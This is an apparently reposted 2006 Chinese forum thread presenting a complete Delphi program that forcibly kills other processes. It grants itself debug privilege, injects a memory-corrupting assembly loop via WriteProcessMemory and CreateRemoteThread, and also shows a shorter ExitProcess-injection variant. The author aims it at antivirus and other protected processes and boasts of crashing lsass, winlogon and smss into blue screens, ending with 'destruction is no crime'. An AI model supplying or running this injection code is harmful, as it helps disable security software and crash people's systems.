[转贴From DFW]远程爆破，另类结束进程的方式（插入线程式）

作者: 木桩 标题: [原创]远程爆破，另类结束进程的方式（插入线程式） 关键字: 结束进程 爆破 分类: 个人专区 密级: 公开 (评分: , 回复: 3, 阅读: 87)  »»

老套结束进程方式是OpenProcess，然后TerminateProcess。但是遇到那些Hook过TerminateProcess的程序，以及内核模式的程序（比如很多杀毒软件），这招就无能为力了。TerminateProcess的最终结果是没有任何变化或者你的程序直接死掉... 老早就想过用其他方式来结束进程了，比如让自己也工作在内核模式...这里给出一种很简单的办法，远程爆破目标程序。说白了，就是插入一个线程到目标程序，执行一段崩溃代码，让目标从内部自己死掉。就好像扔一个炸弹道目标内部，所以叫远程爆破。 实现原理： 1.首先是怎么让目标程序崩溃。平时有遇到程序崩溃吧，还记得那段代码怎么写吗？（谁去记这种会死机的代码啊）不知道怎么写，那告诉你一个最简单的方式吧，CreateRemoteThread的开始地址，直接用0代替，自己试试读写0处的物理内存吧，是不是直接"0x00000000" 指令引用的 "0x00000000" 内存。该内存不能为 "read"。，出现这个就达到目的了。但是保险起见，还是自行写一段必然会引起崩溃的代码好些，毕竟这样稳妥些。   其实不用那么暴力，也能让目标程序结束掉的。还记得ExitProcess()吗？就是那个只能用在自己程序里的退出API，注射 $7C81CAA2 这个的地址就好了（具体怎么获得见后面）。这样就好比扔把刀子给别人，让他去自杀...汗 2.注射线程的例子就很多了，这里略过。主要要注意，对于那些内核模式的进程，不在同级下运行是不能CreateRemoteThread的。而且最好是提升到Debug权限，不然别想远程注射。 程序实现： (全部代码在2楼) 1.EnabledDebugPrivilege(True);  //提升到Debug权限。抄Delphi下深入Windows核心编程里的 2.然后弄到进程ID，放到sc_pID里 hRemoteProcess := OpenProcess(PROCESS_CREATE_THREAD + {允许远程创建线程}       PROCESS_VM_OPERATION + PROCESS_VM_WRITE,          {允许远程VM操作 + 允许远程VM写}       FALSE, sc_pID); 3.获取ExitProcess的地址：（XP下是 $7C81CAA2 ） pfnStartAddr := GetProcAddress(GetModuleHandle('kernel32'), 'ExitProcess'); 4.老方法，从 $7C81CAA2 处远程线程 hThread:=CreateRemoteThread(hRemoteProcess, nil, 0, pfnStartAddr, nil, 0, TempVar); 这里也能直接把第三四步和到一块，更简洁。第二个nil是指ExitProcess的参数，反正我们要调用ExitProcess(0)，所以传nil了。 好了，执行看看，该死的QQ不声不响的关掉了，Word也是，但是lsass.exe不行，ExitProcess根本就没响应。既然这样，就直接爆破吧。 5.修改CreateRemoteThread hThread:=CreateRemoteThread(hRemoteProcess, nil, 0, Pointer($0), Pointer($10000), 0, TempVar); 目标lsass.exe！然后“lsass.exe - 应用程序错误” "0x00000000" 指令引用的 "0x00000000" 内存。该内存不能为 "read"。然后OpenProcess失效，因为lsass已经被干掉了。 但是要注意了，像smss.exe这种内核模式的进程，直接用CreateRemoteThread是新建不了线程的。要想hThread不是0，先让你的程序也运行在内核模式吧。 为看看效果，于是顺手把winlogin.exe spoolsv.exe services.exe也爆破掉了。然后是久违的蓝屏... 注意：千万别去动系统进程，这是我十几次重启换来的血的教训！ Pointer($0)这招，当然也有失效的时候，csrss.exe就能读0地址，不会直接死掉。所以尽量自己实现崩溃代码，让Windows告诉我们“XXX 遇到问题需要关闭。我们对此引起的不便表示抱歉。”吧！其他常见的方法，还有用VirtualAllocEx开一块超大空间，WriteProcessMemory在目标程序里乱写等，不过前提是你的权限足够大。 下面给出完整的程序代码。随便建个控制台程序，粘贴2楼代码，运行！ 2006-7-25 15:24:03      查看评语»»»     2006-7-25 15:42:25    完整的 InsertThreads.dpr program InsertThreads; {如果您还未看懂整个程序，请保留以下信息 进程远程爆破 By 木桩 原贴地址：http://www.delphibbs.com/keylife/iblog_show.asp?xid=23375 } {$APPTYPE CONSOLE} uses   SysUtils, Windows; var inputs:String;     sc_pID:integer;     TempVar:Cardinal;     hRemoteProcess, hThread : THandle;     d_Proc_Addr, pfnStartAddr: Pointer; //需要注射的远程进程执行代码，运行就崩溃 procedure kemThreads(); asm   push 0   pop eax       //eax清零   mov esi,eax   //si,di 归零   mov edi,eax @@Loop:   mov [eax],dword ptr eax //开始乱写内存，然后出错退出   add eax,4   jmp @@Loop end; //提升权限的函数，抄书的 function EnabledDebugPrivilege(const bEnabled: Boolean): Boolean; var   hToken: THandle;   tp: TOKEN_PRIVILEGES;   a: DWORD; const   SE_DEBUG_NAME = 'SeDebugPrivilege'; begin   Result := False;   if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, hToken)) then   begin     tp.PrivilegeCount := 1;     LookupPrivilegeValue(nil, SE_DEBUG_NAME, tp.Privileges[0].Luid);     if bEnabled then       tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED     else       tp.Privileges[0].Attributes := 0;     a := 0;     AdjustTokenPrivileges(hToken, False, tp, SizeOf(tp), nil, a);     Result := GetLastError = ERROR_SUCCESS;     CloseHandle(hToken);   end; end; begin   EnabledDebugPrivilege(True); //提升权限   Write('请输入目标进程pID: '); Readln(inputs);   sc_pID:=strtoint(inputs);   hRemoteProcess := OpenProcess(PROCESS_CREATE_THREAD + {允许远程创建线程}       PROCESS_VM_OPERATION + PROCESS_VM_WRITE,          {允许远程VM操作 + 允许远程VM写}       FALSE, sc_pID);   //这里还要检查hRemoteProcess，是否OpenProcess成功..   //随便开一块 $1000 的内存空间   d_Proc_Addr := VirtualAllocEx(hRemoteProcess, nil, $1000, MEM_COMMIT, PAGE_READWRITE);   //把 kemThreads() 函数写过去   if Not(WriteProcessMemory(hRemoteProcess, d_proc_addr, @kemThreads, $800, TempVar)) then     Writeln('WriteProcessMemory 写目标进程失败。')   else     begin       { 这里注释掉了，演示了如何查找'ExitProcess'的地址       //查找函数的地址         //ExitProcess(kernel32) $7C81CAA2       //MessageBoxA(User32) $77D504EA       pfnStartAddr := GetProcAddress(GetModuleHandle('kernel32'), 'ExitProcess');       Write(format('函数地址: $%0.8x',[integer(pfnStartAddr)]));       }       Writeln(''); TempVar := 0;       //Writeln(format('写入数据位于: %0.8x',[integer(d_Proc_Addr)]));       //写入完成，执行                                         //hThread:=CreateRemoteThread(hRemoteProcess, nil, 0, Pointer($0), Pointer($10000), 0, TempVar);  //这行就是第五条所说的 0地址爆破       hThread:=CreateRemoteThread(hRemoteProcess, nil, 0, d_Proc_Addr, nil, 0, TempVar);  //执行写入的 kemThreads() 函数         if hThread<=0 then begin Writeln('CreateRemoteThread 执行远程线程失败。');  end;     end;     Write('执行完毕'); readln(inputs);  //按回车结束   //VirtualFreeEx(hRemoteProcess, d_Proc_Addr, $1000, MEM_DECOMMIT);   CloseHandle(hRemoteProcess); end.    2006-7-25 15:43:03    附上最精简的ExitProcess方式（但往往达不到结束进程的效果...） var inputs:String;     sc_pID:integer;     TempVar:Cardinal;     hRemoteProcess, hThread : THandle; begin   EnabledDebugPrivilege(True); //提升权限   sc_pID:= {目标进程ID} ;   hRemoteProcess := OpenProcess(PROCESS_CREATE_THREAD+PROCESS_VM_OPERATION+PROCESS_VM_WRITE, FALSE, sc_pID);   hThread:=CreateRemoteThread(hRemoteProcess, nil, 0, Pointer($7C81CAA2), nil, 0, TempVar);   Writeln('线程插入完毕，ThreadID为 '+inttostr(TempVar));   //CloseHandle(hRemoteProcess); end;    2006-7-25 15:55:22    上面那个ExitProcess方式，就是最简单的API调用。随便放在某个按钮里就行，注意修改sc_pID:= {目标进程ID} ;！ 上面那段 procedure kemThreads(); asm   push 0   pop eax       //eax清零   mov esi,eax   //si,di 归零   mov edi,eax @@Loop:   mov [eax],dword ptr eax //开始乱写内存，然后出错退出   add eax,4   jmp @@Loop end; 并不是最好的，也许你能找出更有效的崩溃代码。有什么更好想法的记得回复啊！ 现在研究《编写安全的代码(第2版)》，如发现更狠的代码，我会第一时间贴出来...破坏无罪！ (以上这段崩溃代码，VMware虚拟机里测试过，注射smss.exe后，直接蓝屏 对付winlogin.exe后惊奇的发现，关机按钮消失了，开始菜单里只剩下注销，任务管理器里选项全灰 插入lsass.exe就没什么危害了，弹出个即将关机对话框，shutdown /a 取消半分钟后，蓝屏 unknow hard error...)